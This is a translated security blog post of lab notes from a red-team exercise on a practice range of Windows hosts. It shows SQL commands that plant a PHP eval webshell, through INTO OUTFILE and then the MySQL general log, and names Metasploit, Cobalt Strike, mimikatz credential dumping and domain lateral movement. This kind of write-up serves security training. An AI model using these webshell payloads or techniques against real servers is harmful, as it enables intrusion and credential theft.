SongShuA

SongShuA

胸中梦黄粱,手握自在心 一个充满想法的网络安全从业人员 A person with dreams in their heart and the ability to control their own destiny, who is a creative professional in the field of cybersecurity.
github
HomeArchives

ATT&CK Practical Series - Red Team Assessment (Part 1) Range Notes

249
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses a red team evaluation in a virtual environment. It provides information about the target machines, scanning for vulnerabilities, finding sensitive files, accessing a database, and attempting to gain control over the machines. The author mentions encountering difficulties with certain tools and suggests using alternative methods. The article concludes by mentioning the plan to exploit a Windows 2003 machine and then use it to gain access to a Windows 2008 machine.

ATT&CK Practical Series - Red Team Assessment (Part 1) Range Notes#

Range Connection

Overview:

Virtual machine password
hongrisec@2019 Reset required after login

win7
192.168.0.1/24 Bridged
192.168.52.0/24 Internal network

win2003
192.168.52.0/24 Internal network

win2008
192.168.52.0/24 Internal network

Range Deployment

Start win2008 DC host first
Then start win2003
Finally start win7
Start phpstudy under the C drive of win7 host (software damaged and unable to start, please install separately and migrate files in WWW except for phpmyadmin)

Alt text

Main Content#

Scan the external web server first and check port 80.
@Port Information

@Existence of a probe
@Scan tool used here is Yujian

Scan and brute force directories, find that directory listing is possible. (Possibly caused by the newly installed phpstudy) Found sensitive files beifen.rar and phpmyadmin login.Alt textAlt text

Download and extract sensitive files, found source code. Concatenate the URL according to the source code folder and find a broken CMS, but it doesn't seem to be useful.Alt text

Look at the source code again and find the database password
Alt text
Obtained the root account password for the database, which can be used to log in to phpmyadmin
First, write a webshell, and the path can be obtained from the probe

select "<?php @eval($_POST[a]);?>" into outfile (“C:/WWW/11.php”);

Alt text
Failed, there are restrictions

Try using logs instead

set global general_log='on'; #Enable logging function
set global general_log_file=’D:/WWW/xxx.php’; #Set the log save address

Finally, query again to write the query content into the log

select ‘<?php @eval($_POST[a]);?>’;

Then use a webshell to connect (initially used AntSword, but couldn't connect for unknown reasons).
Alt text
Use a webshell to write a China Chopper for future use, and check the permissions with China Chopper
Alt text

Use China Chopper to launch an msf shell
Alt text

Unable to switch to the shell with msf, always interrupted abnormally, suspected to be caused by antivirus software or firewall

Alt text
Switching to the old method, use a webshell to transfer a shell, and the virtual terminal actively waits for the cs to come online
Alt text
First, delegate a few more clones to myself to prevent session loss

There's not much to say after this. I originally thought I could do something fancy with this range, but I ended up with administrator privileges on the machine, and the remaining two hosts crashed their services. I didn't do much. Still using the old method, first use mimikatz to read passwords from memory.
Following the network topology, win2003 should be compromised first, and then win2008 should be compromised using the domain. Transfer the ticket to 2003, then read the password, obtain the domain admin account, and transfer it to 2008. When dealing with machines that don't have internet access, SMB beacon should be used. Pay attention to the attack session's network segment.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.